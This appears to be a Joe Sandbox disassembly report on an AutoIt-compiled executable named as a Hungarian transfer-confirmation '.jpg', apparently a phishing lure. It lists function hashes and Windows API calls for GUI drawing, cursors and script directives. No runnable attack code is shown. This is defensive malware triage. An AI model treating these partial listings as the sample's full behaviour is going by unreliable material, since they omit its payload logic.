                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: N@
                                                                                                          • API String ID: 0-1509896676
                                                                                                          • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                          • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                          • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                          • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                          • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                          • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                          • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                          • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                          • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                          • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                          • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                          • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                          • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                          • DeleteObject.GDI32(?), ref: 00459551
                                                                                                          • DestroyWindow.USER32(?), ref: 00459563
                                                                                                          • GetDesktopWindow.USER32 ref: 00459581
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                          • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                          • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                          • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                          • _wcslen.LIBCMT ref: 00459916
                                                                                                          • _wcscpy.LIBCMT ref: 0045993A
                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                          • GetDC.USER32(00000000), ref: 004599FC
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                          • API String ID: 4040870279-2373415609
                                                                                                          • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                          • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                          • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                          • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                          • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                          • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                          • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                          • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                          • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                          • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                            • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                            • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 69173610-0
                                                                                                          • Opcode ID: 73519c0d5c6d1b2cd2349601c553421bafd3f67ad8af7c83e76f5c4f38846835
                                                                                                          • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                          • Opcode Fuzzy Hash: 73519c0d5c6d1b2cd2349601c553421bafd3f67ad8af7c83e76f5c4f38846835
                                                                                                          • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                          • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                          • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                          • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                          • API String ID: 2910397461-517079104
                                                                                                          • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                          • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                          • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                          • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                          • API String ID: 1038674560-3360698832
                                                                                                          • Opcode ID: 5ac0d074d0f2c4f3e64cea3940d5eb1af2dab97db6e12398ad8f12eee9a98506
                                                                                                          • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                          • Opcode Fuzzy Hash: 5ac0d074d0f2c4f3e64cea3940d5eb1af2dab97db6e12398ad8f12eee9a98506
                                                                                                          • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                          APIs
                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                          • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                          • SetCursor.USER32(00000000), ref: 00430773
                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                          • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                          • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                          • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                          • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                          • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                          • SetCursor.USER32(00000000), ref: 00430803
                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                          • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                          • SetCursor.USER32(00000000), ref: 00430833
                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                          • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                          • SetCursor.USER32(00000000), ref: 00430863
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                          • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                          • SetCursor.USER32(00000000), ref: 00430887
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                          • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$Load
                                                                                                          • String ID:
                                                                                                          • API String ID: 1675784387-0
                                                                                                          • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                          • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                          • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                          • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                          • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                          • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                          • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                          • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                          • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                          • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                          • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                          • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                          • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                          • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                          • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                          • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                          • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                          • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                          • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                          • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                          Memory Dump Source
